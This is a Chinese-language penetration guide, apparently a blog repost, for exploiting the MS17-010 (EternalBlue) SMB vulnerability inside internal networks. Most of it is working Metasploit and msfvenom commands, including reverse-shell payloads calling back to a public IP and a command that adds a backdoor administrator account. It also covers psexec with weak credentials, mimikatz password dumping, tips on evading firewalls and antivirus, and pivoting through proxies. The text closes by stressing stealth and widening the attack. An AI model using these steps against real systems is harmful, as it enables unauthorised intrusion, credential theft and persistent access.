内网渗透之ms17-010
字数 1059 2025-08-18 11:38:48

MS17-010 (永恒之蓝)漏洞利用完全指南

一、漏洞概述

MS17-010是微软Windows SMB服务中的一个严重漏洞,影响Windows XP到Windows 10/Server 2016等多个版本。该漏洞允许远程攻击者在目标系统上执行任意代码,是内网渗透中常用的攻击手段。

二、环境准备

1. 工具准备

  • Metasploit Framework
  • 方程式漏洞利用工具(替代fb.py的简化工具)
  • 网安永恒之蓝检测工具
  • ew代理工具(用于内网穿透)

2. MSF模块

auxiliary/scanner/smb/smb_ms17_010    # 漏洞检测
exploit/windows/smb/ms17_010_eternalblue  # 直接利用
exploit/windows/smb/ms17_010_psexec    # 通过凭证利用
auxiliary/admin/smb/ms17_010_command   # 执行系统命令

三、漏洞检测

1. 使用MSF检测

use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.100.40-50
set threads 3
run

四、直接利用(eternalblue)

1. 基本利用方法

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set rhost 192.168.100.46
set lhost [公网IP]
run

2. 常见问题

  • Session不稳定:容易died
  • 利用耗时:执行时间较长
  • 成功率低:可能无法成功获取session

3. 替代方案(bind_tcp)

set payload windows/x64/meterpreter/bind_tcp

注意:容易被防火墙和杀毒软件发现

五、方程式漏洞利用工具

1. 工具优势

  • 比MSF模块更稳定
  • 成功率更高
  • 操作更简便

2. 使用步骤

对于Windows Server 2008(x64)

  1. 生成payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=公网IP LPORT=12345 -f dll > x64.dll
  1. 替换工具中的x64.dll文件

  2. MSF监听:

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lport 12345
set lhost 公网IP
run
  1. 在工具中设置目标IP,依次点击Eternalblue、Doublepulsar的Attack

对于Windows Server 2003(x86)

  1. 生成payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=公网IP LPORT=12345 -f dll > x86.dll
  1. 替换工具中的x86.dll文件

  2. MSF监听:

set payload windows/meterpreter/reverse_tcp

六、替代利用方法

1. 通过命令添加用户

use auxiliary/admin/smb/ms17_010_command
set COMMAND "net user hacker P@ssw0rd /add && net localgroup administrators hacker /add"
set RHOSTS 192.168.100.2
run

2. 使用凭证建立会话

use exploit/windows/smb/ms17_010_psexec
set rhosts 192.168.100.2
set SMBUser guest
set SMBPass 123456
run

七、后渗透操作

1. 基本信息收集

getuid
run post/windows/gather/checkvm

2. 进程迁移(提高稳定性)

run post/windows/manage/migrate

3. 密码抓取

load mimikatz
mimikatz_command -f sekurlsa::searchPasswords

八、注意事项

  1. Windows Server 2003

    • 多次执行可能导致系统蓝屏
    • 成功率不稳定
    • 建议优先使用添加用户+凭证登录的方式
  2. 稳定性问题

    • eternalblue获取的session容易died
    • 方程式工具获取的session更稳定
  3. 检测规避

    • bind_tcp方式容易被防火墙/杀软发现
    • 优先使用reverse_tcp方式
  4. 内网穿透

    • 通过ew等代理工具进入内网
    • 在跳板机上传漏洞利用工具

九、参考资源

  1. [利用公网Msf+MS17010跨网段攻击内网]
  2. [萌新初试MS17-010方程式漏洞]
  3. Tide安全团队官网: http://www.TideSec.net

通过以上方法,可以有效地利用MS17-010漏洞进行内网渗透,获取系统权限并进一步扩大攻击范围。实际操作中应根据目标环境选择合适的利用方式,并注意操作的稳定性和隐蔽性。

MS17-010 (永恒之蓝)漏洞利用完全指南 一、漏洞概述 MS17-010是微软Windows SMB服务中的一个严重漏洞,影响Windows XP到Windows 10/Server 2016等多个版本。该漏洞允许远程攻击者在目标系统上执行任意代码,是内网渗透中常用的攻击手段。 二、环境准备 1. 工具准备 Metasploit Framework 方程式漏洞利用工具(替代fb.py的简化工具) 网安永恒之蓝检测工具 ew代理工具(用于内网穿透) 2. MSF模块 三、漏洞检测 1. 使用MSF检测 四、直接利用(eternalblue) 1. 基本利用方法 2. 常见问题 Session不稳定 :容易died 利用耗时 :执行时间较长 成功率低 :可能无法成功获取session 3. 替代方案(bind_ tcp) 注意:容易被防火墙和杀毒软件发现 五、方程式漏洞利用工具 1. 工具优势 比MSF模块更稳定 成功率更高 操作更简便 2. 使用步骤 对于Windows Server 2008(x64) 生成payload: 替换工具中的x64.dll文件 MSF监听: 在工具中设置目标IP,依次点击Eternalblue、Doublepulsar的Attack 对于Windows Server 2003(x86) 生成payload: 替换工具中的x86.dll文件 MSF监听: 六、替代利用方法 1. 通过命令添加用户 2. 使用凭证建立会话 七、后渗透操作 1. 基本信息收集 2. 进程迁移(提高稳定性) 3. 密码抓取 八、注意事项 Windows Server 2003 : 多次执行可能导致系统蓝屏 成功率不稳定 建议优先使用添加用户+凭证登录的方式 稳定性问题 : eternalblue获取的session容易died 方程式工具获取的session更稳定 检测规避 : bind_ tcp方式容易被防火墙/杀软发现 优先使用reverse_ tcp方式 内网穿透 : 通过ew等代理工具进入内网 在跳板机上传漏洞利用工具 九、参考资源 [ 利用公网Msf+MS17010跨网段攻击内网 ] [ 萌新初试MS17-010方程式漏洞 ] Tide安全团队官网: http://www.TideSec.net 通过以上方法,可以有效地利用MS17-010漏洞进行内网渗透,获取系统权限并进一步扩大攻击范围。实际操作中应根据目标环境选择合适的利用方式,并注意操作的稳定性和隐蔽性。